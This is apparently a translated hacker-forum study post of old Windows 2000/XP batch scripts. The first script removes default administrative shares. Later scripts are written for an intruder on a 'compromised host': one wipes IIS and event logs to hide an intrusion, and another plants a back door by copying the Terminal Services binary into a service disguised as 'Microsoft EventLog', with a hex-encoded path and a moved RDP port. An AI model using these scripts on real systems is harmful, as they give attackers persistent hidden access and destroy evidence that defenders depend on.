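Batch Script Study, Part 1

Very old stuff

1. Batch file to delete the default shares on Win2k/XP

Original author: Ex4rch  Mail:Ex4rch@hotmail.com QQ:1672602

I made a small change to the parameter jump logic.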
@echo Preparing to delete all the default shares. When ready, press any key.
@pause
@echo off

rem Check parameters; if none are given, show usage.
if {%1}=={} goto :Usage
rem Code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
if {%2}=={} goto :Finish
net share %2$ /delete
if {%3}=={} goto :Finish
net share %3$ /delete
if {%4}=={} goto :Finish
net share %4$ /delete
if {%5}=={} goto :Finish
net share %5$ /delete
if {%6}=={} goto :Finish
net share %6$ /delete
if {%7}=={} goto :Finish
net share %7$ /delete
if {%8}=={} goto :Finish
net share %8$ /delete
if {%9}=={} goto :Finish
net share %9$ /delete
:Finish
net stop Server
net start Server
echo.
echo All the shares have been deleted
echo.
echo ------------------------------------------------------
echo.
echo Now modifying the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Now using the registry file to change the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temporary files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ----------------------------------------------------------
echo.
echo **************** An example of a batch file ****************
echo * [Use batch file to change the system share properties.]  *
echo *                                                          *
echo *                                                          *
echo *                                                          *
echo *                                                          *
echo *  Error: Not enough parameters                            *
echo *  Please enter the share disk you want to delete          *
echo ************************************************************
echo For instance, to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disk labels are not C: D: E:, please change them yourself.
echo.
echo example:
echo If the local disk labels are C: D: E: X: Y: Z:, you should change the command into:
echo delshare c d e x y z ipc admin print
echo.
echo *** You can delete nine shares in one run ***
echo.
echo ----------------------------------------------------------
goto :EOF
:END
echo.
echo ----------------------------------------------------------
echo.
echo OK, delshare.bat has deleted all the shares you assigned.
echo.
echo.
echo ----------------------------------------------------------
echo.
:EOF
echo end of the batch file

2. Batch files to fully harden a system (patching a compromised host)

A. Disable unnecessary shares

@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [disable the default shares]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [disable anonymous logon]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [disable file access and print sharing]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [disable shutdown before logon]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [do not display the name of the last logged-on user]
@regedit /s patch.dll
@del patch.dll

B. Clear all logs on the compromised host and disable some dangerous services (c:/winnt needs to be changed to %systemboot%)

@net stop w3svc
@net stop event log
@del c:/winnt/system32/logfiles/w3svc1/*.* /f /q
@del c:/winnt/system32/logfiles/w3svc2/*.* /f /q
@del c:/winnt/system32/config/*.event /f /q
@del c:/winnt/system32dtclog/*.* /f /q
@del c:/winnt/*.txt /f /q
@del c:/winnt/*.log /f /q
@net start w3svc
@net start event log
@rem [delete logs]

@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@echo The server has been patched,Have fun.
@REM [disable some dangerous services]

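C. Modify the compromised host's terminal service to leave a back door. (This does not seem to work well; it targets the terminal service program, probably the one on Windows 2000.)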

@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Termina l Server/WinStations/RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Termina l Server/Wds/rdpwd/Tds/tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00 ,52,00,6f,00,6f,00,/ >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00, 32,00,5c,00,65,/ >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78, 00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:/winnt/system32/termsrv.exe c:/winnt/system32/eventlog.exe
@Del patch.dll
@REM [change the 3389 connection: port 8210 (hex 00002012), name Microsoft EventLog, leaving a back door]
